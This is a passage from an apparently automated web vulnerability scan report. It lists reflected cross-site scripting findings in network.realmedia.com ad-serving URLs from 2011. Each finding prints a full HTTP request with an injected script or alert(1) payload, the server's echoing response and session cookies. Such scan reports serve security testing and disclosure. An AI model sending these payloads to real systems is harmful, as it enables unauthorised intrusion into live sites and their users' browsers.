Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:51 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmediae6267"><script>alert(1)</script>8e69d18030e/Retarget_Secure/469969609/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.679. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cc91"><script>alert(1)</script>55a85194b52 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure7cc91"><script>alert(1)</script>55a85194b52/569818986@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 260
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:56 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure7cc91"><script>alert(1)</script>55a85194b52/L18/498250968/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?498250968" TARGET=_blank>

4.680. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 398f7"><script>alert(1)</script>09622cac1b2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3398f7"><script>alert(1)</script>09622cac1b2?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 390
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:40:01 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/1754566200/Bottom3398f7"><script>alert(1)</script>09622cac1b2/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.681. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3 [_RM_HTML_MM_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ab3a"-alert(1)-"65a69611e7a was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3?_RM_HTML_MM_=1011550000100005110018ab3a"-alert(1)-"65a69611e7a HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:46 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|R10M5i|O10M5l|R10M5p|O10M5x|R10M62|O10M69|O1012Mr|O1016F7|O7016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 601
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:48 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS");
var mm247o = "1011550000100005110018ab3a"-alert(1)-"65a69611e7a";
var mm247m = "";
if (mm247o.length==21) {
   var i=0;
   while (i<21) {
       mm247m += mmarray[i] + mm247o.charAt(i);
       i=i+1;
   }
}
document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString()
...[SNIP]...

4.682. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fa55"><script>alert(1)</script>2cda01ab3c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia7fa55"><script>alert(1)</script>2cda01ab3c/Retarget_Secure/598415254@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:03 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia7fa55"><script>alert(1)</script>2cda01ab3c/Retarget_Secure/1075022930/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.683. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a984"><script>alert(1)</script>4173fc658aa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure4a984"><script>alert(1)</script>4173fc658aa/598415254@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 262
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:08 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure4a984"><script>alert(1)</script>4173fc658aa/L18/2146251053/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?2146251053" TARGET=_blank>

4.684. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a322"><script>alert(1)</script>341cdb21cb0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom31a322"><script>alert(1)</script>341cdb21cb0?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 389
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:13 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/955407605/Bottom31a322"><script>alert(1)</script>341cdb21cb0/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.685. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3 [_RM_HTML_MM_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12776"-alert(1)-"7163b7e534f was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3?_RM_HTML_MM_=10115500001000051100112776"-alert(1)-"7163b7e534f HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:46:52 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|R10M5V|O10M5l|R10M5p|R10M5x|R10M69|O1012Mr|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 601
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:37:54 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS");
var mm247o = "10115500001000051100112776"-alert(1)-"7163b7e534f";
var mm247m = "";
if (mm247o.length==21) {
   var i=0;
   while (i<21) {
       mm247m += mmarray[i] + mm247o.charAt(i);
       i=i+1;
   }
}
document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString()
...[SNIP]...

4.686. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f59ab"><script>alert(1)</script>b4e2983415 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmediaf59ab"><script>alert(1)</script>b4e2983415/Retarget_Secure/709688261@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; RMFD=011PiwK1O1016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 396
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:09 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmediaf59ab"><script>alert(1)</script>b4e2983415/Retarget_Secure/486907874/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.687. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf6b6"><script>alert(1)</script>1d151c1f552 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Securecf6b6"><script>alert(1)</script>1d151c1f552/709688261@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; RMFD=011PiwK1O1016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 262
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:14 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Securecf6b6"><script>alert(1)</script>1d151c1f552/L18/1267156266/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?1267156266" TARGET=_blank>

4.688. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 453af"><script>alert(1)</script>99c2aff247f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

